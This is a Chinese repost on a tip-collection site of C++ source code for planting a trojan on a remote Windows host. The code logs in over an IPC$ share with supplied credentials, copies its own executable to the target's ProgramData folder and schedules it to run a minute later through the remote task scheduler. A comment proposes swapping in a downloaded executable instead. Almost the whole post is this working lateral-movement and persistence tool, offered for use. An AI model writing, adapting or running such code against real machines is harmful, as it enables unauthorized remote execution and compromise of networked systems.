实现:ipc管道连接到远程计划任务种马
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实现:ipc管道连接到远程计划任务种马相关的知识,希望对你有一定的参考价值。
#pragma comment(lib, "mpr.lib")
#pragma comment(lib,"Netapi32.lib")
#include <windows.h>
#include <lm.h>
#include <tchar.h>
#include <stdio.h>
#include <Winnetwk.h>
#include <string>
#include <lmat.h>
//using namespace std;
void GetError(DWORD ret) {
wchar_t * pMsgBuf;
FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS
, NULL, ret, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPSTR)&pMsgBuf, 0, NULL);
wprintf(L"WNetAddConnection2 failed with error: %u, %s \n", ret, pMsgBuf);
LocalFree(pMsgBuf);
}
int wmain(int argc, wchar_t * argv[]) {
/*
DWORD WNetAddConnection2W(
LPNETRESOURCEW lpNetResource,
LPCWSTR lpPassword,
LPCWSTR lpUserName,
DWORD dwFlags
);
*/
DWORD dwRetVal;
std::wstring MyRemoteName;
NETRESOURCE nr;
DWORD dwFlags;
MyRemoteName.append(L"\\\\");
if (argc != 5 && argc != 4) {
wprintf(L"Usage: %s <localname> <remotename> <username> <password>\n",argv[0]);
wprintf(L"Usage: %s <remotename> <username> <password>\n",argv[0]);
exit(1);
}
if (argc == 5) {
MyRemoteName.append(argv[2]);
wprintf(L"Calling WNetAddConnection2 with\n");
wprintf(L" lpLocalName = %s\n", argv[1]);
wprintf(L" lpRemoteName = %s\n", MyRemoteName.c_str());
wprintf(L" lpUsername = %s\n", argv[3]);
wprintf(L" lpPassword = %s\n", argv[4]);
memset(&nr, 0, sizeof(NETRESOURCE));
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = argv[1];
nr.lpRemoteName = (LPWSTR)MyRemoteName.c_str();
nr.lpProvider = NULL;
dwFlags = CONNECT_TEMPORARY; //连接类型 是否可持续
dwRetVal = WNetAddConnection2(&nr, argv[4], argv[3], dwFlags);
if (dwRetVal == NO_ERROR) {
wprintf(L"Connection added to %s\n", nr.lpRemoteName);
}
else {
GetError(dwRetVal);
}
}
else if (argc == 4) {
MyRemoteName.append(argv[1]);
wprintf(L"Calling WNetAddConnection2 with\n");
wprintf(L"lpRemoteName = %s\n", (LPWSTR)MyRemoteName.c_str());
wprintf(L"lpUsername = %s\n", argv[2]);
wprintf(L"lpPassword = %s\n", argv[3]);
//结构体初始化
memset(&nr, 0, sizeof(NETRESOURCE));
//结构体的补充,这四个必须填写
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL; //本地映射磁盘
nr.lpRemoteName = (LPWSTR)MyRemoteName.c_str(); // 远程访问的资源
nr.lpProvider = NULL;
dwFlags = CONNECT_TEMPORARY; //连接类型 是否可持续
dwRetVal = WNetAddConnection2(&nr,argv[3], argv[2], dwFlags);
if (dwRetVal == NO_ERROR){
//IPC管道成功连接
wprintf(L"Connection added to %s\n", nr.lpRemoteName);
//RemoteFilePath字符串用来拼接路径
std::wstring RemoteFilePath;
RemoteFilePath = MyRemoteName.append(L"\\c$\\ProgramData\\mytask.exe"); // \\192.168.1.152\c$ProgramData\mytask.exe
//复制文件到对方的机器的指定目录中
wchar_t LocalModuleEXE[MAX_PATH];
GetModuleFileName(NULL, LocalModuleEXE, MAX_PATH); //得到当前执行文件的文件名称 (包含路径) 之后可以改为远程下载的指定exe程序等....
if (CopyFile(LocalModuleEXE, RemoteFilePath.c_str(), FALSE) != 0) { //复制文件 若存在则覆盖
//获取远程服务器的当前时间
wprintf(L"copyfile successful\n");
//初始化结构体
LPTIME_OF_DAY_INFO ti = NULL;
std::wstring MyRemoteServerName;
//MyRemoteServerName字符串用来作为 \\ip 这样的形式进行调用
MyRemoteServerName.append(L"\\\\");
MyRemoteServerName.append(argv[1]);
if (NetRemoteTOD(MyRemoteServerName.c_str(), (LPBYTE *)&ti) == NERR_Success) {
wprintf(L"Get remote time successful\n");
//拼接字符串进行计划任务的添加
//DWORD day = 1;
wchar_t command[] = L"c:\\ProgramData\\mytask.exe";
AT_INFO at; //结构体的设置
at.DaysOfWeek = 0;
at.DaysOfMonth = 0;
at.Flags = JOB_NONINTERACTIVE; //非交互式运行程序
at.JobTime = ((ti->tod_hours + (-ti->tod_timezone) / 60) % 24) * 60 * 60 * 1000 + (ti->tod_mins + 1) * 60 * 1000;
at.Command = command; //需要执行的命令内容
DWORD id;
if(NetScheduleJobAdd(MyRemoteServerName.c_str(),(LPBYTE)&at,&id) == NERR_Success){
wprintf(L"Job add successful\n");
}
else {
wprintf(L"Job add failed\n");
}
}
else {
wprintf(L"Get remote time failed\n");
}
}
else {
wprintf(L"copyfile failed\n");
}
}
else {
GetError(dwRetVal);
}
}
return 0;
}
参考文章:https://blog.csdn.net/weixin_34408624/article/details/86248485
以上是关于实现:ipc管道连接到远程计划任务种马的主要内容,如果未能解决你的问题,请参考以下文章